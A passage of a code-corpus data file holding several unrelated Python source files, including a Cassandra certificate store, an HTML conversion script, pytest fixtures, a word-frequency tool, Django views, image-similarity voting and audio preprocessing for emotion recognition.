cert_details\n }\n stmt = query.SimpleStatement(\n CQL_UPDATE_CERT_DETAILS,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, args)\n\n try:\n provider_status = json.loads(list(cert_details.values())[0])\n cert_status = provider_status['extra_info']['status']\n self.insert_cert_status(domain_name, cert_status)\n except (IndexError, KeyError, ValueError) as e:\n # certs already existing in DB should have all\n # the necessary fields\n LOG.error(\n \"Unable to update 
cert_status because certificate \"\n \"details are in an inconsistent \"\n \"state: {0}: {1}\".format(cert_details, e))\n\n def insert_cert_status(self, domain_name, cert_status):\n cert_args = {\n 'domain_name': domain_name,\n 'status': cert_status\n }\n stmt = query.SimpleStatement(\n CQL_INSERT_CERT_STATUS,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, cert_args)\n\n def get_certs_by_status(self, status):\n\n LOG.info(\"Getting domains which have \"\n \"certificate in status : {0}\".format(status))\n args = {\n 'status': status\n }\n stmt = query.SimpleStatement(\n CQL_GET_CERTS_BY_STATUS,\n consistency_level=self._driver.consistency_level)\n resultset = self.session.execute(stmt, args)\n complete_results = list(resultset)\n\n return complete_results\n\n def get_certs_by_domain(self, domain_name, project_id=None,\n flavor_id=None,\n cert_type=None):\n\n LOG.info(\"Check if cert on '{0}' exists\".format(domain_name))\n args = {\n 'domain_name': domain_name.lower()\n }\n stmt = query.SimpleStatement(\n CQL_SEARCH_CERT_BY_DOMAIN,\n consistency_level=self._driver.consistency_level)\n resultset = self.session.execute(stmt, args)\n complete_results = list(resultset)\n certs = []\n if complete_results:\n for r in complete_results:\n r_project_id = str(r.get('project_id'))\n r_flavor_id = str(r.get('flavor_id'))\n r_cert_type = str(r.get('cert_type'))\n r_cert_details = {}\n # in case cert_details is None\n cert_details = r.get('cert_details', {}) or {}\n # Need to convert cassandra dict into real dict\n # And the value of cert_details is a string dict\n for key in cert_details:\n r_cert_details[key] = json.loads(cert_details[key])\n LOG.info(\n \"Certificate for domain: {0} with flavor_id: {1}, \"\n \"cert_details : {2} and cert_type: {3} present \"\n \"on project_id: {4}\".format(\n domain_name,\n r_flavor_id,\n r_cert_details,\n r_cert_type,\n r_project_id\n )\n )\n ssl_cert = ssl_certificate.SSLCertificate(\n domain_name=domain_name,\n flavor_id=r_flavor_id,\n cert_details=r_cert_details,\n cert_type=r_cert_type,\n project_id=r_project_id\n )\n\n certs.append(ssl_cert)\n\n non_none_attrs_gen = filterfalse(\n lambda x: list(x.values())[0] is None, [{'project_id': project_id},\n {'flavor_id': flavor_id},\n {'cert_type': cert_type}])\n non_none_attrs_list = list(non_none_attrs_gen)\n non_none_attrs_dict = {}\n\n if non_none_attrs_list:\n for attr in non_none_attrs_list:\n non_none_attrs_dict.update(attr)\n\n def argfilter(certificate):\n all_conditions = True\n if non_none_attrs_dict:\n for k, v in non_none_attrs_dict.items():\n if getattr(certificate, k) != v:\n all_conditions = False\n\n return all_conditions\n\n total_certs = [cert for cert in certs if argfilter(cert)]\n\n if len(total_certs) == 1:\n return total_certs[0]\n else:\n return total_certs\n\n def cert_already_exist(self, domain_name, comparing_cert_type,\n comparing_flavor_id, comparing_project_id):\n \"\"\"cert_already_exist\n\n Check if a cert with this domain name and type has already been\n created, or if the domain has been taken by other customers\n\n :param domain_name\n :param comparing_cert_type\n :param comparing_flavor_id\n :param comparing_project_id\n\n :returns Boolean if the cert with same type exists with another user.\n \"\"\"\n cert = self.get_certs_by_domain(\n domain_name=domain_name,\n cert_type=comparing_cert_type,\n flavor_id=comparing_flavor_id\n )\n\n if cert:\n return True\n else:\n return 
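# get_certs_by_domain above keeps only the keyword filters the caller actually
# supplied (non-None) before matching certificates. The filterfalse dance can
# also be written as a dict comprehension; a standalone sketch with toy certs:
from collections import namedtuple

Cert = namedtuple('Cert', 'project_id flavor_id cert_type')
certs = [Cert('p1', 'flavor', 'san'), Cert('p2', 'flavor', 'sni')]

requested = {'project_id': None, 'flavor_id': 'flavor', 'cert_type': 'san'}
active = {k: v for k, v in requested.items() if v is not None}

matched = [c for c in certs
           if all(getattr(c, k) == v for k, v in active.items())]
assert matched == [Cert('p1', 'flavor', 'san')]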
False\n","sub_path":"poppy/storage/cassandra/certificates.py","file_name":"certificates.py","file_ext":"py","file_size_in_byte":10945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181705252","text":"#!/usr/bin/python\nimport sys\nfrom bs4 import BeautifulSoup\n\nalpha = \"abcdefghijklmnopqrstwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\nd={'Introduction':'1','Theory':'2','Objective':'3','Virtual Lab':'4','Manual':'5','Quiz':'6','Video':'7','Reference':'8'}\nfile_read = raw_input(\"Enter the name of the source file: \")\nsoup = BeautifulSoup(open(file_read))\ndiv = ''\nfile_name = ''\nflag = 0\nexp = ''\nbl = 0\nfor i in soup.title.string:\n\t\n\tif ((i == \":\") or (i == \")\")):\n\t\tbreak\n\n\tif( i in alpha and (bl == 0)):\n\t\tbl = 1 \n\tif(bl==1):\n\t\n\t\tfile_name += i\n\n\t\tif i == \"(\":\n\t\t\tflag = 1\n\t\t\tcontinue\n\t\n\t\tif flag == 0:\n\t\t\texp += i\n\n\t\tif flag == 1:\n\t\t\tdiv += i\n\n#fo = open(file_name+\").txt\", \"w\")\n#print \"Name of the file: \", fo.name\n#fo.write(\"Title\"app+\"\\n\");\n\nfile_w = raw_input(\"Enter the name of the destination file: \")\nf = open(file_w,\"r\")\nf_content = f.read()\nf.close()\n\nso = BeautifulSoup(f_content)\n\t\natt = ''+'experiment-article-section-'+d[div]+'-content'\n\ntagger = so.findAll('div', attrs={'id':att,'class':'content'})\ntag = tagger[0]\ntag.clear() \n\nexp_name = so.findAll('header', attrs={'class':'heading','id':'experiment-article-heading'})\nexp_n = exp_name[0]\nexp_n.clear()\nexp_n.insert(1,exp)\nif (d[div]=='4' or d[div]=='7'):\n\tcont = soup.findAll('div', attrs={'class': 'divLink'})\nelse:\n\tcont = soup.findAll('div', attrs={'class': 'divContent'})\ntag.insert(1,cont[0])\n\nf = open(file_w,\"w\")\nf.write(str(so))\nf.close()\n#fo.close()\n#-----------Created by----------------------#\n#-----Pranitha and Sourav-------------------#\n#-----------Conversion of html files to new UI(blue icon theme) format------#\n","sub_path":"lik-release-0.5.0/ui-1.0-toolkit/scripts/automated-scripts/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"505903840","text":"import pytest\n\n\n@pytest.yield_fixture()\ndef setup():\n print('Running before every Test')\n yield\n print('Running after every Test')\n\n\n@pytest.yield_fixture(scope='class')\ndef one_time_setup(browser, os_type,request):\n print('Running Once before all Tests')\n if browser == 'firefox':\n print('Running Firefox Browser')\n value = 10\n elif browser == 'Chrome':\n print('Running Chrome Browser')\n value = 20\n if request.cls is not None:\n request.cls.value = value\n yield value\n print('Running Once after all Tests')\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\")\n parser.addoption(\"--osType\", help=\"Please specify os Type\")\n\n\n@pytest.fixture(scope=\"session\")\ndef browser(request):\n return request.config.getoption(\"--browser\")\n\n\n@pytest.fixture(scope=\"session\")\ndef os_type(request):\n return request.config.getoption(\"--osType\")\n\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"341185819","text":"#!/usr/bin/env python\n\"\"\" Frequent Words extractor [Productivity Tool]\nScan the given directory, list all the words appear in certain type of files\nGenerator a list of that words\nMainly 
for vim completion\n@Author: Zhifeng(fengyu05@gmail.com)\n\"\"\"\n\nusage = \"usage: %prog [--min_length=5] [--min_fre=5] filetype directory\"\n\nimport sys\nimport re\nfrom optparse import OptionParser\nfrom os import listdir\nfrom os.path import isdir,islink,join\n\nparser = OptionParser(usage)\nparser.add_option(\"-l\", \"--min_length\", dest=\"MIN_LENGTH\",\n type=\"int\",\n default = 7,\n help=\"min length that concerns\")\n\nparser.add_option(\"-f\", \"--min_freq\", dest=\"MIN_FREQUENT\",\n type=\"int\",\n default = 7,\n help=\"min frequent that concerns\")\n\nparser.add_option(\"-d\", \"--max_deep\", dest=\"MAX_DEEP\",\n type=\"int\",\n default = 20,\n help=\"max deep of directory\")\n\nwordDict = dict()\n\ndef checkWords(filetype, directory, options, deep):\n if deep > options.MAX_DEEP:\n return\n for file in listdir(directory):\n fileFullPath = join(directory, file)\n if isdir(fileFullPath) and not islink(fileFullPath):\n checkWords(filetype, fileFullPath, options, deep + 1)\n else:\n if fileFullPath.endswith(\".\" + filetype):\n content = open(fileFullPath, \"r\").readlines()\n for line in content:\n words = re.split('\\W+', line)\n for word in words:\n if len(word) >= options.MIN_LENGTH:\n if word in wordDict:\n wordDict[word] = wordDict[word] + 1\n else:\n wordDict[word] = 1\n\ndef genWords(options):\n freqWords = [word for word, frequent in wordDict.iteritems() \n if frequent >= options.MIN_FREQUENT]\n for word in freqWords:\n print (word)\n\ndef main():\n (options, argv) = parser.parse_args()\n if len(argv) < 2:\n parser.error(\"incorrect number of arguments\")\n sys.exit(1)\n filetype = argv[0]\n directory = argv[1]\n checkWords(filetype, directory, options, 0)\n genWords(options)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"utt/freqword_extractor.py","file_name":"freqword_extractor.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"454552729","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom listings.models import Listing\nfrom realtors.models import Realtor\n\ndef index(request):\n listings=Listing.objects.order_by('list_date').filter(is_published=True)[:3]\n context = {\n 'listings':listings\n }\n return render(request,'pages/index.html', context)\n\n\ndef about(request):\n\n realtors=Realtor.objects.order_by('-hire_date')\n mpv_realtor=Realtor.objects.all().filter(is_mvp=True)\n context={\n 'realtors':realtors,\n 'mpv_realtor': mpv_realtor\n }\n \n return render(request,'pages/about.html', context)\n\n\n","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"9844837","text":"import cv2, enum, time, os, math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import rankdata\n\n#############################################################################\n# User variables (static)\n#############################################################################\nclass PltFunc :\n def plot1row2Img(img1, img2):\n fig = plt.figure()\n fig.add_subplot(1,2,1)\n plt.imshow(img1)\n fig.add_subplot(1,2,2)\n plt.imshow(img2)\n plt.show() \n\nclass ALG(enum.Enum):\n MAE = 0\n MSE = 1\n RMSE = 2\n PSNR = 3\n SSIM = 4\n P_MSE = 5 \n \nclass ImgCompare :\n def cvt256gray(img) :\n img = cv2.resize(img, (256,256), interpolation=cv2.INTER_LINEAR )\n img = cv2.cvtColor(img, 
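# The metric helpers that follow are chained: RMSE is sqrt(MSE) and PSNR is
# 20*log10(255/RMSE). A numpy-only worked example on two tiny made-up arrays
# (no cv2 resizing here, so the numbers differ from the class methods):
import math
import numpy as np

a = np.array([[10.0, 20.0], [30.0, 40.0]])
b = np.array([[12.0, 18.0], [33.0, 44.0]])

mse = np.mean((a - b) ** 2)                   # (4 + 4 + 9 + 16) / 4 = 8.25
psnr = 20 * math.log10(255.0 / math.sqrt(mse))
assert abs(mse - 8.25) < 1e-9 and 38 < psnr < 40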
cv2.COLOR_BGR2GRAY)\n return img\n \n def mae(img1, img2):\n img1 = ImgCompare.cvt256gray(img1)\n img2 = ImgCompare.cvt256gray(img2)\n err = np.sum(abs((img1.astype(\"float\") - img2.astype(\"float\"))))\n err /= float(img1.shape[0] * img1.shape[1])\n return err\n\n def mse(img1, img2):\n img1 = ImgCompare.cvt256gray(img1)\n img2 = ImgCompare.cvt256gray(img2)\n err = np.sum((img1.astype(\"float\") - img2.astype(\"float\")) ** 2)\n err /= float(img1.shape[0] * img1.shape[1])\n return err\n\n def p_mse(img1, img2):\n img1 = ImgCompare.cvt256gray(img1)\n img2 = ImgCompare.cvt256gray(img2)\n maxval = np.max((img1.astype(\"float\") - img2.astype(\"float\")) ** 2)\n err = np.sum((img1.astype(\"float\") - img2.astype(\"float\")) ** 2)\n err /= float(img1.shape[0] * img1.shape[1])\n return err/maxval\n\n def rmse(img1, img2):\n err = ImgCompare.mse(img1, img2)\n return math.sqrt(err)\n\n def psnr(img1, img2):\n _rmse = ImgCompare.rmse(img1,img2)\n if _rmse == 0:\n return 100\n PIXEL_MAX = 255.0\n return 20 * math.log10(PIXEL_MAX / _rmse)\n\n def percent_ssim(img1, img2) :\n from skimage.measure import compare_ssim as ssim\n #img1 = cv2.resize(img1, (256,256), interpolation=cv2.INTER_LINEAR )\n #img2 = cv2.resize(img2, (256,256), interpolation=cv2.INTER_LINEAR )\n s = ssim(img1,img2, multichannel = True)\n return s\n\nclass ViewGuide :\n def mainLoop(rBase, tImgPath) :\n start = time.time()\n tempPath = rBase\n rImageList = os.listdir(tempPath)\n rImageList.sort()\n #print(tempPath+rImageList[0])\n tImg = cv2.imread(tImgPath)\n #plt.imshow(tImg)\n #plt.show()\n tImg = cv2.resize(tImg, (256,256), interpolation=cv2.INTER_LINEAR )\n tImg = cv2.cvtColor(tImg, cv2.COLOR_BGR2RGB)\n rImgs = []\n ssimArr = []\n psnrArr = []\n pmseArr = []\n \n votingArr = [[1,3,9],[0,4,2,10],[1,5,11],[0,4,6,12],[1,3,5,7],[2,4,8,13],[3,7,14],[4,6,8,15],[5,7,16],[0,10,12,17],[1,9,11,18],[2,10,13,19],[3,9,14,20],[5,11,16,22],[6,12,15,23],[7,14,16,24],[8,13,15,25],[9,18,20],[10,17,19,21],[11,18,22],[12,17,21,23],[18,20,22,24],[13,19,21,25],[14,20,24],[15,21,23,25],[16,22,24]]\n \n for filename in rImageList :\n rImg = cv2.imread(tempPath+filename)\n plt.imshow(rImg)\n plt.show()\n rImg = rImg[150:1200, 300:1600]\n rImg = cv2.resize(rImg, (256,256), interpolation=cv2.INTER_LINEAR )\n rImg = cv2.cvtColor(rImg, cv2.COLOR_BGR2RGB)\n rImgs.append(rImg)\n #PltFunc.plot1row2Img(rImg, tImg)\n ssim = ImgCompare.percent_ssim(rImg, tImg)\n psnr = ImgCompare.psnr(rImg, tImg)\n pmse = ImgCompare.p_mse(rImg, tImg)\n #print(filename)\n #print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssim*100.0, psnr,pmse*100.0) )\n \n ssimArr.append(ssim)\n psnrArr.append(psnr)\n pmseArr.append(pmse)\n \n \n print(\"calc Total time : \", (time.time() - start), 'sec')\n print(ssimArr)\n \n ssimRank = rankdata(ssimArr)\n psnrRank = rankdata(psnrArr)\n pmseRank = rankdata(pmseArr)\n votingArrSSIM = [0 for _ in range(26)]\n votingArrPSNR = [0 for _ in range(26)]\n votingArrPMSE = [0 for _ in range(26)]\n votingArrSum = [0 for _ in range(26)]\n \n for i in range(len(ssimRank)) :\n votingArrSSIM[i] += (ssimRank[i]-1)\n votingArrPSNR[i] += (psnrRank[i]-1)\n votingArrPMSE[i] += (pmseRank[i]-1)\n \n for j in votingArr[i] :\n votingArrSSIM[j] += (ssimRank[i]-1)/2\n votingArrPSNR[j] += (psnrRank[i]-1)/2\n votingArrPMSE[j] += (pmseRank[i]-1)/2\n \n for i in range(len(votingArrSSIM)) :\n votingArrSum[i]+=votingArrSSIM[i]\n votingArrSum[i]+=votingArrPSNR[i]\n votingArrSum[i]+=votingArrPMSE[i]\n \n votingSsimRank = rankdata(votingArrSSIM)\n votingPsnrRank = 
rankdata(votingArrPSNR)\n votingPmseRank = rankdata(votingArrPMSE)\n votingSumRank = rankdata(votingArrSum)\n \n #print (votingArrSSIM)\n for i in range(len(rImgs)):\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n print(\"==================================================================================\")\n print(\"Voting SSIM\")\n print(\"==================================================================================\")\n for j in range(0,10) :\n for i in range(len(votingSsimRank)) :\n if (votingSsimRank[i] == (26-j)) :\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n print(\"==================================================================================\")\n print(\"Voting PSNR\")\n print(\"==================================================================================\")\n for j in range(0,10) :\n for i in range(len(votingPsnrRank)) :\n if (votingPsnrRank[i] == (26-j)) :\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n print(\"==================================================================================\")\n print(\"Voting PMSE\")\n print(\"==================================================================================\")\n for j in range(0,10) :\n for i in range(len(votingPmseRank)) :\n if (votingPmseRank[i] == (26-j)) :\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n print(\"==================================================================================\")\n print(\"Voting SUM\")\n print(\"==================================================================================\")\n for j in range(0,10) :\n for i in range(len(votingSumRank)) :\n if (votingSumRank[i] == (26-j)) :\n PltFunc.plot1row2Img(rImgs[i], tImg)\n print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssimArr[i]*100.0, psnrArr[i],pmseArr[i]*100.0) )\n print( \"voting ssim : %.2f [%d]\" % (votingArrSSIM[i], votingSsimRank[i]))\n print( \"voting psnr : %.2f [%d]\" % (votingArrPSNR[i], votingPsnrRank[i]))\n 
print( \"voting pmse : %.2f [%d]\" % (votingArrPMSE[i], votingPmseRank[i]))\n print( \"voting sum : %.2f [%d]\" % (votingArrSum[i], votingSumRank[i]))\n \n \nif __name__ == \"__main__\":\n renderImageBasePath = \"./renderimage/bonsai1/1/\"\n targetImageBasePath = \"./targetimage/bonsai1/1/\"\n targetImageFullPath = targetImageBasePath + 'bonsai1.jpg'\n \n ViewGuide.mainLoop(renderImageBasePath, targetImageFullPath)\n\n \n \n","sub_path":"SDDVR/viewpointGuiding/viewpointVoting_bonsai.py","file_name":"viewpointVoting_bonsai.py","file_ext":"py","file_size_in_byte":9733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"628009076","text":"import numpy as np\nimport os\nimport utilities_func as uf\nimport feat_analysis2 as fa\nimport pandas\nimport loadconfig\nimport ConfigParser\n#np.random.seed(24)\n\n#load configuration file\nconfig = loadconfig.load()\ncfg = ConfigParser.ConfigParser()\ncfg.read(config)\n\nSEQ_LENGTH = cfg.getint('preprocessing', 'sequence_length')\nSEQ_OVERLAP = cfg.getfloat('preprocessing', 'sequence_overlap')\n\nSOUND_FOLDER_PRETRAINING_T = cfg.get('preprocessing', 'input_audio_folder_PRETRAINING_t')\nANNOTATION_FOLDER_PRETRAINING_T = cfg.get('preprocessing', 'input_annotation_folder_PRETRAINING_t')\nOUTPUT_PREDICTORS_MATRIX_PRETRAINING_T = cfg.get('preprocessing', 'output_predictors_matrix_PRETRAINING_t')\nOUTPUT_TARGET_MATRIX_PRETRAINING_T = cfg.get('preprocessing', 'output_target_matrix_PRETRAINING_t')\n\nSOUND_FOLDER_PRETRAINING_V = cfg.get('preprocessing', 'input_audio_folder_PRETRAINING_v')\nANNOTATION_FOLDER_PRETRAINING_V = cfg.get('preprocessing', 'input_annotation_folder_PRETRAINING_v')\nOUTPUT_PREDICTORS_MATRIX_PRETRAINING_V = cfg.get('preprocessing', 'output_predictors_matrix_PRETRAINING_v')\nOUTPUT_TARGET_MATRIX_PRETRAINING_V = cfg.get('preprocessing', 'output_target_matrix_PRETRAINING_v')\n\nPREDICTORS_TOBEMERGED = cfg.get('preprocessing', 'output_predictors_matrix_t')\nTARGET_TOBEMERGED = cfg.get('preprocessing', 'output_target_matrix_t')\n\nOUTPUT_MERGED_PREDICTORS = cfg.get('preprocessing', 'output_predictors_matrix_merged')\nOUTPUT_MERGED_TARGET = cfg.get('preprocessing', 'output_target_matrix_merged')\n\nbounds_dict = np.load('../dataset/OMG2017/bounds_dict.npy')\nbounds_dict = bounds_dict.item()\n\nTARGET_DELAY = cfg.getint('preprocessing', 'target_delay')\nSR = cfg.getint('sampling', 'sr')\nHOP_SIZE = cfg.getint('stft', 'hop_size')\n\nfps = 25 #annotations per second\nhop_annotation = SR /fps\nframes_per_annotation = hop_annotation/float(HOP_SIZE)\n#frames_per_annotation = int(np.round(frames_per_annotation))\n'''\nreminder = frames_per_annotation % 1\n\nif reminder != 0.:\n raise ValueError('Hop size must be a divider of annotation hop (640)')\nelse:\n frames_per_annotation = int(frames_per_annotation)\n'''\nframes_delay = int(TARGET_DELAY * frames_per_annotation)\n\n\ndef merge_matrices(dataset1_path, dataset2_path, output_path):\n data1 = np.load(dataset1_path)\n data2 = np.load(dataset2_path)\n out_data = np.vstack((data1, data2))\n np.save(output_path, out_data)\n print(\"Successfully merged: \" + dataset1_path + ' AND ' + dataset2_path + ' INTO ' + output_path)\n print('Shape of merged matrix: ' + str(out_data.shape))\n\ndef preprocess_datapoint(input_sound, input_annotation):\n '''\n generate predictors (stft) and target (valence sequence)\n of one sound file from the OMG dataset\n '''\n name = input_sound.split('/')[-1].split('.')[0]\n start = bounds_dict[name]['start']\n end = 
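# The voting scheme above gives each view its full rank and spreads half of
# that rank to each adjacent view before re-ranking. A compact sketch of the
# propagation on a made-up 4-node adjacency (not the 26-view grid above):
from scipy.stats import rankdata

scores = [0.2, 0.9, 0.4, 0.7]                 # e.g. per-view SSIM values
neighbors = [[1], [0, 2], [1, 3], [2]]        # toy adjacency list

ranks = rankdata(scores)                      # 1 = worst match
votes = [0.0] * len(scores)
for i, r in enumerate(ranks):
    votes[i] += r - 1                         # full weight for the view itself
    for j in neighbors[i]:
        votes[j] += (r - 1) / 2.0             # half weight for each neighbour
print(rankdata(votes))                        # final ordering after smoothing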
bounds_dict[name]['end']\n startframe = int(np.round(start * fps))\n endframe = int(np.round(end*fps))\n startsamps = int(np.round(start*SR))\n endsamps = int(np.round(end*SR))\n\n sr, samples = uf.wavread(input_sound) #read audio\n samples = samples[startsamps:endsamps]\n e_samples = uf.preemphasis(samples, sr) #apply preemphasis\n feats = fa.extract_features(e_samples) #extract features\n annotation = np.load(input_annotation) #read annotations\n annotation = annotation[startframe:endframe]\n annotated_frames = int(len(annotation) * frames_per_annotation)\n feats = feats[:annotated_frames] #discard non annotated final frames\n annotation = annotation[TARGET_DELAY:] #shift back annotations by target_delay\n feats2 = feats[:-frames_delay]\n\n return feats, annotation\n\ndef segment_datapoint(features, annotation, sequence_length, sequence_overlap):\n '''\n segment features and annotations of one long audio file\n into smaller matrices of length \"sequence_length\"\n and overlapped by \"sequence_overlap\"\n '''\n step = sequence_length*sequence_overlap #segmentation overlap step\n num_datapoints = int(len(annotation) / step)\n pointer = np.arange(0,len(annotation), step, dtype='int') #initail positions of segments\n predictors = []\n target = []\n #slice arrays and append datapoints to vectors\n for start in pointer:\n start_annotation = start\n stop_annotation = start + sequence_length\n start_features = int(start_annotation * frames_per_annotation)\n stop_features = int(stop_annotation * frames_per_annotation)\n #print start_annotation, stop_annotation, start_features, stop_features\n if stop_annotation <= len(annotation):\n temp_predictors = features[start_features:stop_features]\n temp_target = annotation[start_annotation:stop_annotation]\n predictors.append(temp_predictors)\n target.append(temp_target)\n #target.append(np.mean(temp_target))\n else: #last datapoint has a different overlap\n temp_predictors = features[-int(sequence_length*frames_per_annotation):]\n temp_target = annotation[-sequence_length:]\n predictors.append(temp_predictors)\n target.append(temp_target)\n #target.append(np.mean(temp_target))\n predictors = np.array(predictors)\n target = np.array(target)\n\n return predictors, target\n\n\ndef preprocess_dataset(sound_folder, annotation_folder):\n '''\n build dataset numpy matrices:\n -predictors: contatining audio features\n -target: contatining correspective valence annotations\n both are NOT normalized\n datapoints order is randomly scrambled\n '''\n predictors = []\n target = []\n annotations = os.listdir(annotation_folder)\n #filtered_list = filter_items(annotations, target_subject, target_story)\n num_sounds = len(annotations)\n #process all files in folders\n index = 0\n for datapoint in annotations:\n print(datapoint)\n annotation_file = annotation_folder + '/' + datapoint\n name = datapoint.split('.')[0]\n sound_file = sound_folder + '/' + name +\".mp4.wav\" #get correspective sound\n long_predictors, long_target = preprocess_datapoint(sound_file, annotation_file) #compute features\n cut_predictors, cut_target = segment_datapoint(long_predictors, long_target, #slice feature maps\n SEQ_LENGTH, SEQ_OVERLAP)\n\n predictors.append(cut_predictors)\n target.append(cut_target)\n perc_progress = (index * 100) / num_sounds\n index += 1\n print(\"processed files: \" + str(index) + \" over \" + str(num_sounds) + \" | progress: \" + str(perc_progress) + \"%\")\n\n predictors = np.concatenate(predictors, axis=0) #reshape arrays\n target = np.concatenate(target, axis=0)\n 
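# segment_datapoint above windows a long sequence with starts advancing by
# sequence_length * overlap, re-anchoring any overflowing window at the end.
# A numpy sketch of just that windowing arithmetic (toy lengths):
import numpy as np

seq_len, overlap = 4, 0.5
annotation = np.arange(10)

step = int(seq_len * overlap)
windows = [annotation[s:s + seq_len] if s + seq_len <= len(annotation)
           else annotation[-seq_len:]          # overflow: take the tail
           for s in np.arange(0, len(annotation), step)]
print([w.tolist() for w in windows])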
#scramble datapoints order\n shuffled_predictors = []\n shuffled_target = []\n num_datapoints = target.shape[0]\n random_indices = list(range(num_datapoints)) #list() so np.random.shuffle can permute it in place (a plain range cannot be shuffled in python 3)\n np.random.shuffle(random_indices)\n for i in random_indices:\n shuffled_predictors.append(predictors[i])\n shuffled_target.append(target[i])\n shuffled_predictors = np.array(shuffled_predictors)\n shuffled_target = np.array(shuffled_target)\n\n return shuffled_predictors, shuffled_target\n\ndef build_matrices(output_predictors_matrix, output_target_matrix, sound_folder, annotation_folder):\n '''\n build matrices and save numpy files\n '''\n predictors, target = preprocess_dataset(sound_folder, annotation_folder)\n np.save(output_predictors_matrix, predictors)\n np.save(output_target_matrix, target)\n print(\"Matrices saved successfully\")\n print('predictors shape: ' + str(predictors.shape))\n print('target shape: ' + str(target.shape))\n\ndef crossval_preprocessing(target_subject_t, target_story_t, target_subject_v, target_story_v):\n ''' build matrices for one defined crossvalidation instance'''\n #set output matrices as default temp crossvalidation ones\n OUTPUT_PREDICTORS_MATRIX_T = '../dataset/matrices/crossval_temp_predictors_t.npy'\n OUTPUT_TARGET_MATRIX_T = '../dataset/matrices/crossval_temp_target_t.npy'\n OUTPUT_PREDICTORS_MATRIX_V = '../dataset/matrices/crossval_temp_predictors_v.npy'\n OUTPUT_TARGET_MATRIX_V = '../dataset/matrices/crossval_temp_target_v.npy'\n #substitute config target subject and stories with the ones of the experiment\n TARGET_SUBJECT_T = target_subject_t\n TARGET_STORY_T = target_story_t\n TARGET_SUBJECT_V = target_subject_v\n TARGET_STORY_V = target_story_v\n\n #build training matrix\n #NOTE: stale helper -- build_matrices() takes 4 arguments, and SOUND_FOLDER_T/ANNOTATION_FOLDER_T are not defined in this file\n build_matrices(OUTPUT_PREDICTORS_MATRIX_T, OUTPUT_TARGET_MATRIX_T,\n SOUND_FOLDER_T, ANNOTATION_FOLDER_T, TARGET_SUBJECT_T, TARGET_STORY_T)\n\n\nif __name__ == '__main__':\n '''\n build training and validation matrices\n '''\n build_matrices(OUTPUT_PREDICTORS_MATRIX_PRETRAINING_T, OUTPUT_TARGET_MATRIX_PRETRAINING_T, SOUND_FOLDER_PRETRAINING_T, ANNOTATION_FOLDER_PRETRAINING_T)\n build_matrices(OUTPUT_PREDICTORS_MATRIX_PRETRAINING_V, OUTPUT_TARGET_MATRIX_PRETRAINING_V, SOUND_FOLDER_PRETRAINING_V, ANNOTATION_FOLDER_PRETRAINING_V)\n\n #merge_matrices(OUTPUT_PREDICTORS_MATRIX_2017, PREDICTORS_TOBEMERGED, OUTPUT_MERGED_PREDICTORS)\n #merge_matrices(OUTPUT_TARGET_MATRIX_2017, TARGET_TOBEMERGED, 